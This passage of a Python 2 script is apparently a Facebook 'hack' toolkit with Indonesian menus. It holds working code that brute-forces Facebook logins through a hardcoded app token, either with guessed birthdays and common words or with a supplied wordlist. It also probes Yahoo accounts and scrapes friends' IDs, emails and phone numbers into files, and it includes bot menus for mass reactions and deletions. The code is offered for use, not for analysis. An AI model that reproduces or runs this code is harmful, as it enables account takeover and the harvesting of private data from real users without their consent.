print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass4 + ' --> ' + b['name']

else:

birthday = b['birthday']

pass5 = birthday.replace('/', '')

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass5 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

print '\x1b[1;97m[\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass5 + ' --> ' + b['name']

else:

pass6 = ('sayang')

data = urllib.urlopen('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + user + '&locale=en\_US&password=' + pass6 + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

q = json.load(data)

if 'access\_token' in q:

print '\x1b[1;97m\x1b[1;92m[✓]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']

else:

if 'www.facebook.com' in q['error\_msg']:

print '\x1b[1;97m\x1b[1;93m[+]\x1b[1;97m ' + user + ' | ' + pass6 + ' --> ' + b['name']

except:

pass

p = ThreadPool(30)

p.map(main, id)

print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

super()

def brute():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(0.5)

login()

else:

os.system('clear')

print logo

print '╔' + 52 \* '\x1b[1;97m\xe2\x95\x90'

try:

email = raw\_input('\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m/\x1b[1;92mEmail\x1b[1;97m/\x1b[1;92mHp \x1b[1;97mTarget \x1b[1;91m:\x1b[1;97m ')

passw = raw\_input('\x1b[1;91m[+] \x1b[1;92mWordlist \x1b[1;97mext(list.txt) \x1b[1;91m: \x1b[1;97m')

total = open(passw, 'r')

total = total.readlines()

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mTarget \x1b[1;91m:\x1b[1;97m ' + email

print '\x1b[1;91m[+] \x1b[1;92mTotal\x1b[1;96m ' + str(len(total)) + ' \x1b[1;92mPassword'

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

sandi = open(passw, 'r')

for pw in sandi:

try:

pw = pw.replace('\n', '')

sys.stdout.write('\r\x1b[1;91m[\x1b[1;96m\xe2\x9c\xb8\x1b[1;91m] \x1b[1;92mTry \x1b[1;97m' + pw)

sys.stdout.flush()

data = requests.get('https://b-api.facebook.com/method/auth.login?access\_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk\_version=2&email=' + email + '&locale=en\_US&password=' + pw + '&sdk=ios&generate\_session\_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6')

mpsh = json.loads(data.text)

if 'access\_token' in mpsh:

dapat = open('Brute.txt', 'w')

dapat.write(email + ' | ' + pw + '\n')

dapat.close()

print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw

keluar()

else:

if 'www.facebook.com' in mpsh['error\_msg']:

ceks = open('Brutecekpoint.txt', 'w')

ceks.write(email + ' | ' + pw + '\n')

ceks.close()

print '\n\x1b[1;91m[+] \x1b[1;92mFounded.'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[!] \x1b[1;93mAccount Maybe Checkpoint'

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mUsername \x1b[1;91m:\x1b[1;97m ' + email

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mPassword \x1b[1;91m:\x1b[1;97m ' + pw

keluar()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[!] Connection Error'

time.sleep(1)

except IOError:

print '\x1b[1;91m[!] File not found...'

print '\n\x1b[1;91m[!] \x1b[1;92mSepertinya kamu tidak memiliki wordlist'

tanyaw()

def tanyaw():

why = raw\_input('\x1b[1;91m[?] \x1b[1;92mKamu ingin membuat wordlist ? \x1b[1;92m[y/t]\x1b[1;91m:\x1b[1;97m ')

if why == '':

print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'

tanyaw()

else:

if why == 'y':

wordlist()

else:

if why == 'Y':

wordlist()

else:

if why == 't':

menu\_hack()

else:

if why == 'T':

menu\_hack()

else:

print '\x1b[1;91m[!] Mohon Pilih \x1b[1;97m(y/t)'

tanyaw()

def menu\_yahoo():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. From Friends'

print '║-> \x1b[1;37;40m2. From File'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

yahoo\_pilih()

def yahoo\_pilih():

go = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if go == '':

print '\x1b[1;91m[!] Can\'t empty'

yahoo\_pilih()

else:

if go == '1':

yahoofriends()

else:

if go == '2':

yahoolist()

else:

if go == '0':

menu\_hack()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + go + ' \x1b[1;91mTidak Ditemukan'

yahoo\_pilih()

def yahoofriends():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token Tidak Ada'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

mpsh = []

jml = 0

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')

friends = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

kimak = json.loads(friends.text)

save = open('MailVuln.txt', 'w')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for w in kimak['data']:

jml += 1

mpsh.append(jml)

id = w['id']

nama = w['name']

links = requests.get('https://graph.facebook.com/' + id + '?access\_token=' + toket)

z = json.loads(links.text)

try:

mail = z['email']

yahoo = re.compile('@.\*')

otw = yahoo.search(mail).group()

if 'yahoo.com' in otw:

br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')

br.\_factory.is\_html = True

br.select\_form(nr=0)

br['username'] = mail

klik = br.submit().read()

jok = re.compile('"messages.ERROR\_INVALID\_USERNAME">.\*')

try:

pek = jok.search(klik).group()

except:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'

continue

if '"messages.ERROR\_INVALID\_USERNAME">' in pek:

save.write(mail + '\n')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id

print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'

print 52 \* '\x1b[1;97m\xe2\x95\x90'

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'

except KeyError:

pass

print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'

print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'

save.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

menu\_yahoo()

def yahoolist():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

files = raw\_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')

try:

total = open(files, 'r')

mail = total.readlines()

except IOError:

print '\x1b[1;91m[!] File not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_yahoo()

mpsh = []

jml = 0

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

save = open('MailVuln.txt', 'w')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'

print

mail = open(files, 'r').readlines()

for pw in mail:

mail = pw.replace('\n', '')

jml += 1

mpsh.append(jml)

yahoo = re.compile('@.\*')

otw = yahoo.search(mail).group()

if 'yahoo.com' in otw:

br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')

br.\_factory.is\_html = True

br.select\_form(nr=0)

br['username'] = mail

klik = br.submit().read()

jok = re.compile('"messages.ERROR\_INVALID\_USERNAME">.\*')

try:

pek = jok.search(klik).group()

except:

print '\x1b[1;91m ' + mail

continue

if '"messages.ERROR\_INVALID\_USERNAME">' in pek:

save.write(mail + '\n')

print '\x1b[1;92m ' + mail

else:

print '\x1b[1;91m ' + mail

print '\n\x1b[1;91m[+] \x1b[1;97mFinish'

print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'

save.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

menu\_yahoo()

def grab():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Get ID From Friends'

print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'

print '║-> \x1b[1;37;40m3. Get ID From GRUP'

print '║-> \x1b[1;37;40m4. Get Friends Email'

print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'

print '║-> \x1b[1;37;40m6. Get Phone From Friends'

print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

grab\_pilih()

def grab\_pilih():

cuih = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if cuih == '':

print '\x1b[1;91m[!] Can\'t empty'

grab\_pilih()

else:

if cuih == '1':

id\_friends()

else:

if cuih == '2':

idfrom\_friends()

else:

if cuih == '3':

id\_member\_grup()

else:

if cuih == '4':

email()

else:

if cuih == '5':

emailfrom\_friends()

else:

if cuih == '6':

nomor\_hp()

else:

if cuih == '7':

hpfrom\_friends()

else:

if cuih == '0':

menu\_hack()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'

grab\_pilih()

def id\_friends():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

r = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

z = json.loads(r.text)

save\_id = raw\_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

bz = open(save\_id, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for ah in z['data']:

idfriends.append(ah['id'])

bz.write(ah['id'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']

print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)

print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save\_id

bz.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except KeyError:

os.remove(save\_id)

print '\x1b[1;91m[!] An error occurred'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def idfrom\_friends():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

idt = raw\_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')

try:

jok = requests.get('https://graph.facebook.com/' + idt + '?access\_token=' + toket)

op = json.loads(jok.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']

except KeyError:

print '\x1b[1;91m[!] Not be friends'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access\_token=' + toket)

z = json.loads(r.text)

save\_idt = raw\_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

bz = open(save\_idt, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for ah in z['friends']['data']:

idfromfriends.append(ah['id'])

bz.write(ah['id'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']

print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)

print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save\_idt

bz.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def id\_member\_grup():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

id = raw\_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')

try:

r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access\_token=' + toket)

asw = json.loads(r.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']

except KeyError:

print '\x1b[1;91m[!] Group not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

simg = raw\_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

b = open(simg, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access\_token=' + toket)

s = json.loads(re.text)

for i in s['data']:

idmem.append(i['id'])

b.write(i['id'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']

print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)

print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg

b.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except KeyError:

os.remove(simg)

print '\x1b[1;91m[!] Group not found'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def email():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

mails = raw\_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

r = requests.get('https://graph.facebook.com/me/friends?access\_token=' + toket)

a = json.loads(r.text)

mpsh = open(mails, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for i in a['data']:

x = requests.get('https://graph.facebook.com/' + i['id'] + '?access\_token=' + toket)

z = json.loads(x.text)

try:

em.append(z['email'])

mpsh.write(z['email'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']

print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

except KeyError:

pass

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)

print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails

mpsh.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except KeyError:

os.remove(mails)

print '\x1b[1;91m[!] An error occurred'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def emailfrom\_friends():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

idt = raw\_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')

try:

jok = requests.get('https://graph.facebook.com/' + idt + '?access\_token=' + toket)

op = json.loads(jok.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']

except KeyError:

print '\x1b[1;91m[!] Not be friends'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

mails = raw\_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

r = requests.get('https://graph.facebook.com/' + idt + '/friends?access\_token=' + toket)

a = json.loads(r.text)

mpsh = open(mails, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for i in a['data']:

x = requests.get('https://graph.facebook.com/' + i['id'] + '?access\_token=' + toket)

z = json.loads(x.text)

try:

emfromfriends.append(z['email'])

mpsh.write(z['email'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']

print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

except KeyError:

pass

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)

print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails

mpsh.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def nomor\_hp():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

noms = raw\_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

url = 'https://graph.facebook.com/me/friends?access\_token=' + toket

r = requests.get(url)

z = json.loads(r.text)

no = open(noms, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for n in z['data']:

x = requests.get('https://graph.facebook.com/' + n['id'] + '?access\_token=' + toket)

z = json.loads(x.text)

try:

hp.append(z['mobile\_phone'])

no.write(z['mobile\_phone'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']

print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile\_phone']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

except KeyError:

pass

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)

print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms

no.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Error when creating file'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except KeyError:

os.remove(noms)

print '\x1b[1;91m[!] An error occurred '

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def hpfrom\_friends():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

else:

try:

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

idt = raw\_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')

try:

jok = requests.get('https://graph.facebook.com/' + idt + '?access\_token=' + toket)

op = json.loads(jok.text)

print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']

except KeyError:

print '\x1b[1;91m[!] Not be friends'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

noms = raw\_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')

r = requests.get('https://graph.facebook.com/' + idt + '/friends?access\_token=' + toket)

a = json.loads(r.text)

no = open(noms, 'w')

jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')

print 52 \* '\x1b[1;97m\xe2\x95\x90'

for i in a['data']:

x = requests.get('https://graph.facebook.com/' + i['id'] + '?access\_token=' + toket)

z = json.loads(x.text)

try:

hpfromfriends.append(z['mobile\_phone'])

no.write(z['mobile\_phone'] + '\n')

print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']

print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile\_phone']

print 52 \* '\x1b[1;97m\xe2\x95\x90'

except KeyError:

pass

print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)

print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms

no.close()

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except IOError:

print '\x1b[1;91m[!] Make file failed'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except (KeyboardInterrupt, EOFError):

print '\x1b[1;91m[!] Stopped'

raw\_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')

grab()

except requests.exceptions.ConnectionError:

print '\x1b[1;91m[\xe2\x9c\x96] No connection'

keluar()

def menu\_bot():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'

print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'

print '║-> \x1b[1;37;40m3. Bot Comment Target Post'

print '║-> \x1b[1;37;40m4. Bot Comment Group Post'

print '║-> \x1b[1;37;40m5. Mass Delete Post'

print '║-> \x1b[1;37;40m6. Accept Friend Requests'

print '║-> \x1b[1;37;40m7. Unfriends'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

bot\_pilih()

def bot\_pilih():

bots = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if bots == '':

print '\x1b[1;91m[!] Can\'t empty'

bot\_pilih()

else:

if bots == '1':

menu\_react()

else:

if bots == '2':

grup\_react()

else:

if bots == '3':

bot\_komen()

else:

if bots == '4':

grup\_komen()

else:

if bots == '5':

deletepost()

else:

if bots == '6':

accept()

else:

if bots == '7':

unfriend()

else:

if bots == '0':

menu()

else:

print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'

bot\_pilih()

def menu\_react():

os.system('clear')

try:

toket = open('login.txt', 'r').read()

except IOError:

print '\x1b[1;91m[!] Token not found'

os.system('rm -rf login.txt')

time.sleep(1)

login()

os.system('clear')

print logo

print 52 \* '\x1b[1;97m\xe2\x95\x90'

print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'

print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'

print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'

print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'

print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'

print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'

print '║-> \x1b[1;31;40m0. Back'

print '\x1b[1;37;40m║'

react\_pilih()

def react\_pilih():

global tipe

aksi = raw\_input('╚═\x1b[1;91m▶\x1b[1;97m ')

if aksi == '':

print '\x1b[1;91m[!] Can\'t empty'

